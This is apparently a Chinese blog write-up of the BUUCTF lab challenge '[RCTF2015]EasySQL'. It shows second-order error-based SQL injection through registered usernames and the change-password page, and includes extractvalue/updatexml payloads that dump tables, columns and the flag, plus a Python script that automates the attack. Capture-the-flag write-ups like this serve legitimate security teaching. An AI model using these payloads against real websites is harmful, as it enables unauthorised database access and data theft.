[RCTF2015]EasySQL

最新推荐文章于 2024-03-19 07:00:00 发布

超级兵_140

最新推荐文章于 2024-03-19 07:00:00 发布

阅读量273

点赞数

分类专栏： BUUCTF 文章标签：数据库 web安全

本文链接：https://blog.csdn.net/Yb_140/article/details/127807220

版权

BUUCTF 专栏收录该内容

99 篇文章 0 订阅

订阅专栏

一个登录，一个注册

先注册一个账号登录进去

点击用户名，发现可以修改密码

试了一下，没有可以利用的地方

我们再注册一个账号

再次修改密码时，发现有报错

利用报错注入

1"||updatexml(1,concat(0x7e,database(),1),1)#

得到数据库名：web_sqli1

爆破数据表

1"||(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())))))#

爆列名

1"||(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')))))#

爆数据

1"||(extractvalue(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)))))#

换个姿势

1"||extractvalue(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))))#

flag{3ca12c0d-6e95-4757-ac45-6f

读到的flag不完整

倒置输出一下

1"||extractvalue(1,concat(0x7e,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))))#

拼接一下，flag：

flag{3ca12c0d-6e95-4757-ac45-6f3472683b23}

再给一个脚本：

import requests

url='http://1144ab58-5e34-46c0-a862-6e01e9b355f0.node4.buuoj.cn:81/'
url1=url+'register.php'
url2=url+'login.php'
url3=url+'changepwd.php'

res=requests.session()
def register(username):
    data = {
        'username' : username,
        'password' : '1',
        'email' : '1',
    }
    res.post(url=url1, data=data)

def login(username):
    data = {
        'username' : username,
        'password' : '1',
    }
    res.post(url=url2, data=data) 
    
def change():
    data = {
        'oldpass' : '1',
        'newpass' : '1',
    }
    flagg = res.post(url=url3, data=data)
    if 'XPATH' in flagg.text:
        print(flagg.text)    
    
    
def go(username):
    register(username)
    login(username)
    change()

go('1"||(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())))))#1')
go('1"||(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name="users")))))#1')
go('1"||extractvalue(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp("^f"))))#1')
go('1"||extractvalue(1,concat(0x7e,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp("^f")))))#1')